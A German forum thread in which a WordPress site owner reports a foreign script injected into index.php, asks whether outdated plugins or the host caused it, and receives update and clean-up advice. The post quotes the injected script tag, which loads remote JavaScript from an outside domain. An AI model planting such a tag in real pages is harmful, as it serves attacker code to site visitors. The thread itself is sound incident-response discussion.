Sicherheitslücke oder Provider-Problem? >> fremdes JS in index.php

  • Hallo,

    gestern hat uns ein Kunde informiert, dass es ein problem mit der Webseite gibt!
    Nach kurzem Check stellte sich heraus, dass in der index.php im Wordpress-Rootfolder etwas eingetragen wurde: Ein JS einer SPAM-WARE:

    <script type="text/javascript" src="http://madskill.com/jex/cb.php"POC"</script>

    Nun die Frage:
    Kann man über Plugins mit Sicherheitslücke einem Span-Bot Zugang auf die Index.php von Wordpress geben um diese zu manipulieren?
    Komischerweise wurde zeitgleich vom Provider Updates gefahren was die Seite so oder so lahm legte, was für mich eher auf eine Sicherheitslücke in deren System hinweist und somit Zugriff auf den FTP zuließ!?


    Ich würde nun gern wissen, ob ich eher dem Provider anhauen soll die Passwörter des Webspaces zu ändern, da sie wohl die sicherheitslücken hatten oder ob wir die Plugins tauschen müßen!? Der Provider ist ein eher kleiner & privater Anbieter in Ort!

    Wordpress läuft seit 2 Jahren stabil auf 3.2

    Plugins sind folgende:
    Admin Menu Editor - Version 1.1.3
    Advanced Custom Fields - Version 2.0.5
    Bild/Foto - Version 3
    BWP Google XML Sitemaps - Version 1.1.4
    Contact Form 7 - Version 2.4.6
    Custom Taxonomy Sort - Version 1.1.2
    MEE News Premium - Version 5.0.1
    WP SlimStat & WP SlimStat Dashboard Widgets - Version 2.5


    Besten Dank für euer feedback!
    thx

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Ich würde dir erst mal vorschlagen, dein Wordpress inkl der Plugins auf den neusten Stand zu bringen. Dann würde ich alle Passwörter ändern und ggfs ein sauberes Backup einspielen.

  • Es sind mittlerweile einige Hacks für Wordpress 3.2 bekannt. Also ist man eigentlich selbst schuld, wenn man keine Updates macht. Mach es so wie Hille gesagt hat. Ich würde nur die Reihenfolge ändern: Passwörter ändern, sauberes Backup einspielen, alles auf den neusten Stand bringen.

    Das Geheimnis des Könnens liegt im Wollen!
    [size=12]Bitte keine Hilfegesuche per PN (auch keine "privaten" Links). Das ist ein öffentliches Forum.[/SIZE]

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!